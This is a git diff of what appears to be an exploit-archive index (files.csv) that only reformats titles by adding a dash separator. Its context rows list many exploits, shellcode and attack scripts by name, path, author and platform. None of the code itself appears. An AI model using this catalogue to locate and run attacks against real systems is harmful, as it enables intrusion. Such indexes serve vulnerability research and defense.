diff --git a/files.csv b/files.csv
index 127ca1023..859939f20 100755
--- a/files.csv
+++ b/files.csv
@@ -14504,7 +14504,7 @@ id,file,description,date,author,platform,type,port
 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,metasploit,windows,remote,80
 16698,platforms/windows/remote/16698.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,metasploit,windows,remote,0
 16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,metasploit,windows,remote,0
-16700,platforms/windows/remote/16700.rb,"Outlook ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0
+16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0
 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,windows,remote,3306
 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,metasploit,windows,remote,21
 16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server Input Overflow",2010-10-05,metasploit,windows,remote,0
@@ -15068,7 +15068,7 @@ id,file,description,date,author,platform,type,port
 17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0
 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection Vulnerability",2011-05-26,"AutoSec Tools",php,webapps,0
 17326,platforms/windows/shellcode/17326.rb,"DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0
-17327,platforms/php/webapps/17327.txt,"HB Ecommerce SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0
+17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0
 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0
 17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0
 17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0
@@ -16525,7 +16525,7 @@ id,file,description,date,author,platform,type,port
 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0
 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0
 19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 - /etc/group missing results in Root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0
-19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0
+19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 - POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0
 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D symlink Vulnerability",1998-07-15,emffmmadffsdf,linux,remote,0
 19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid Vulnerability",1999-04-29,"Dan Sugalski",linux,local,0
 19126,platforms/solaris/local/19126.txt,"Sun Solaris <= 2.6 power management Vulnerability",1998-07-16,"Ralf Lehmann",solaris,local,0
@@ -16761,7 +16761,7 @@ id,file,description,date,author,platform,type,port
 19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"Jesús López de Aguileta",multiple,remote,0
 19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0
 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0
-19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0
+19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 - Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0
 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0
 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0
 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0
@@ -17018,7 +17018,7 @@ id,file,description,date,author,platform,type,port
 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow Vulnerability (2)",1999-11-30,"Synnergy Networks",unix,remote,0
 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure",1999-11-30,UNYUN,solaris,local,0
 19648,platforms/solaris/local/19648.c,"Solaris 7.0 CDE dtmail/mailtool Buffer Overflow Vulnerability",1999-11-30,UNYUN,solaris,local,0
-19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
+19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
 19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc Symlink Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
 19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 Seyon setgid dialer Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath Buffer Overflow Vulnerability",1999-12-01,"Brock Tellier",freebsd,local,0
@@ -17069,7 +17069,7 @@ id,file,description,date,author,platform,type,port
 19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0
 19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow Vulnerability",1999-12-31,"Ussr Labs",windows,dos,0
 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH Vulnerability",1999-12-30,Loneguard,multiple,local,0
-19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1 a GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0
+19705,platforms/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow Vulnerability",1999-12-31,"Brock Tellier",unixware,remote,0
 19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 midikeys/soundplayer Vulnerability",1999-12-31,Loneguard,irix,local,0
 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link Vulnerability",1999-12-31,Loneguard,unix,local,0
 19708,platforms/php/remote/19708.php,"PHP <= 3.0.13 - 'safe_mode' Failure Vulnerability",2000-01-04,"Kristian Koehntopp",php,remote,0
@@ -17084,7 +17084,7 @@ id,file,description,date,author,platform,type,port
 19717,platforms/java/remote/19717.rb,"Java Applet Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,metasploit,java,remote,0
 19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,metasploit,windows,remote,0
 19719,platforms/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 preview Security Zone Settings Lag Vulnerability",2000-01-07,"Georgi Guninski",windows,remote,0
-19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0
+19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist Vulnerability",2000-01-10,"Steve Fewer",windows,dos,0
 19721,platforms/multiple/local/19721.txt,"MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability",2000-02-15,"Viktor Fougstedt",multiple,local,0
 19722,platforms/unix/remote/19722.txt,"RedHat <= 6.1_IRIX <= 6.5.18 lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0
 19723,platforms/linux/local/19723.txt,"Corel Linux OS 1.0 get_it PATH Vulnerability",2000-01-12,"Cesar Tascon Alvarez",linux,local,0
@@ -17308,7 +17308,7 @@ id,file,description,date,author,platform,type,port
 19950,platforms/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver Denial of Service Vulnerability",2000-05-18,"Chris Evans",linux,dos,0
 19951,platforms/cgi/remote/19951.php,"QuickCommerce 2.5/3.0_Cart32 2.5 a/3.0_Shop Express 1.0_StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability",2000-02-01,CDI,cgi,remote,0
 19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0
-19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0
+19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount - Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0
 19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0_Slackware 3.x/4.0_Turbolinux 6_OpenLinux 7.0 fdmount Buffer Overflow (3)",2000-05-22,WaR,linux,local,0
 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0_qpopper 2.52/2.53 - 'EUIDL' Format String Input Vulnerability",2000-05-24,Prizm,linux,local,0
 19956,platforms/cgi/remote/19956.txt,"hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal Vulnerability",2000-05-24,"Ussr Labs",cgi,remote,8000
@@ -17732,15 +17732,15 @@ id,file,description,date,author,platform,type,port
 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0
 20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS Vulnerability",2000-11-10,sozni,cgi,dos,0
 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0
-20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0
+20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 - Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0
 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0
 20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,dos,0
 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0
 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0
 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0
-20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
+20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - _thesection_ Directory Traversal Vulnerability",2000-11-20,zorgon,cgi,remote,0
-20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
+20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption Vulnerability",2000-11-18,"Steven Alexander",windows,local,0
 20410,platforms/unix/local/20410.cpp,"Jan Hubicka Koules 1.4 Svgalib Buffer Overflow Vulnerability",2000-11-20,Synnergy.net,unix,local,0
 20411,platforms/linux/local/20411.c,"Oracle 8.x cmctl Buffer Overflow Vulnerability",2000-11-20,anonymous,linux,local,0
 20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 JSP Source Disclosure Vulnerability",2000-11-21,"Wojciech Woch",jsp,remote,0
@@ -18836,7 +18836,7 @@ id,file,description,date,author,platform,type,port
 21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting Vulnerability",2002-06-14,"Dave Palumbo",windows,remote,0
 21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0
 21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File Arbitrary Command Execution Vulnerability",2002-06-15,onlooker,php,webapps,0
-21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0
+21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure Vulnerability",2002-06-15,cult,cgi,webapps,0
 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)",2002-06-17,"Gobbles Security",multiple,remote,0
 21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)",2002-06-17,"Gobbles Security",multiple,remote,0
 21561,platforms/hardware/dos/21561.txt,"Zyxel Prestige 642R Malformed Packet Denial of Service Vulnerability",2002-07-17,"Kistler Ueli",hardware,dos,0
@@ -19107,7 +19107,7 @@ id,file,description,date,author,platform,type,port
 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface Cross-Site Scripting Vulnerability",2002-09-23,"Taylor Huff",hardware,remote,0
 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service Vulnerability",2002-09-24,"Brook Powers",hardware,dos,0
 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection Vulnerability",2002-09-24,das@hush.com,php,webapps,0
-21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
+21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0
 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0
 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload Vulnerability",2012-10-10,metasploit,php,webapps,0
 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload Vulnerability",2012-10-10,metasploit,linux,webapps,0
@@ -19587,7 +19587,7 @@ id,file,description,date,author,platform,type,port
 22327,platforms/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall Content Filter Bypassing Vulnerability",2003-03-05,bit_logic,multiple,remote,0
 22328,platforms/windows/dos/22328.txt,"Dr.Web 4.x Virus Scanner Folder Name Buffer Overflow Vulnerability",2003-03-05,"Fernandez Madrid",windows,dos,0
 22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 HTML Source Password Retrieval Vulnerability",2003-03-03,THR,windows,local,0
-22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0
+22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - Display Variable Local Buffer Overflow Vulnerability",2002-03-02,"Knud Erik Hojgaard",unix,local,0
 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution Vulnerability",2003-03-06,"gregory Le Bras",php,webapps,0
 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 Logbook.pl Remote Command Execution Vulnerability",2003-03-07,"Aleksey Sintsov",cgi,webapps,0
 22338,platforms/windows/remote/22338.txt,"Clearswift MailSweeper 4.x Malformed MIME Attachment Filter Bypass Vulnerability",2003-03-07,http-equiv,windows,remote,0
@@ -19622,7 +19622,7 @@ id,file,description,date,author,platform,type,port
 22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
 22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0
-22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
+22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0
 22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0
 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0
@@ -20745,7 +20745,7 @@ id,file,description,date,author,platform,type,port
 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0
 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0
 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0
-23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 Crash PoC",2012-12-20,nitr0us,multiple,dos,0
+23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0
 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting Vulnerability",2004-01-06,Windak,php,webapps,0
 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 PHPInfo Information Disclosure Weakness",2004-01-06,Windak,php,webapps,0
 23527,platforms/hardware/remote/23527.txt,"ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",hardware,remote,0
@@ -21008,7 +21008,7 @@ id,file,description,date,author,platform,type,port
 23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 Pop Parameter Cross-Site Scripting Vulnerability",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0
 23796,platforms/windows/remote/23796.html,"Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability",2004-03-09,shaun2k2,windows,remote,0
 23797,platforms/php/webapps/23797.txt,"Confixx 2 DB Parameter SQL Injection Vulnerability",2004-03-09,wkr,php,webapps,0
-23798,platforms/php/webapps/23798.txt,"Confixx 2 Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0
+23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0
 23799,platforms/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 - Engine Remote Format String Vulnerability",2004-03-10,"Luigi Auriemma",multiple,dos,0
 23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0
 23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting Vulnerability",2004-03-11,"Donato Ferrante",linux,remote,0
@@ -22941,7 +22941,7 @@ id,file,description,date,author,platform,type,port
 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability",2005-06-01,"Jim Pangalos",asp,webapps,0
 25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0
 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 LOGIN.ASP SQL Injection Vulnerability",2005-06-01,"Dj romty",asp,webapps,0
-25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0
+25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation Vulnerability",2005-06-01,"Benjamin Tobias Franz",windows,remote,0
 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0
 25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0
 25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 - Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0
@@ -23068,7 +23068,7 @@ id,file,description,date,author,platform,type,port
 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
 25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0
-25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0
+25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0
 25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0
 25918,platforms/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution Vulnerability",2005-06-29,blahplok,cgi,webapps,0
 25919,platforms/php/webapps/25919.txt,"Phorum 5.0.11 Read.PHP SQL Injection Vulnerability",2004-10-24,"Positive Technologies",php,webapps,0
@@ -23321,7 +23321,7 @@ id,file,description,date,author,platform,type,port
 26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0
 26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0
 26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET msdds.dll Remote Code Execution Vulnerability",2005-08-17,anonymous,windows,remote,0
-26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0
+26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration Vulnerability",2005-08-18,"Roy Hills",hardware,remote,0
 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 Site Parameter Directory Traversal Vulnerability",2005-08-18,matrix_killer,php,webapps,0
 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 login.php course Parameter XSS",2005-08-18,matrix_killer,php,webapps,0
 26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.PHP Arbitrary Command Execution Vulnerability",2005-08-18,rgod,php,webapps,0
@@ -25943,7 +25943,7 @@ id,file,description,date,author,platform,type,port
 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0
 28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0
-28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
+28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0
 28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.PHP Remote File Include Vulnerability",2006-11-07,navairum,php,webapps,0
 28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0
@@ -33334,7 +33334,7 @@ id,file,description,date,author,platform,type,port
 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
-36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
+36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
 36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
@@ -33952,7 +33952,7 @@ id,file,description,date,author,platform,type,port
 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
 37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
 37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80
-37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
+37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 - Authenticated Stored XSS",2015-07-16,"Filippos Mastrogiannis",php,webapps,0
 37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0
@@ -34172,7 +34172,7 @@ id,file,description,date,author,platform,type,port
 37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0
 37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
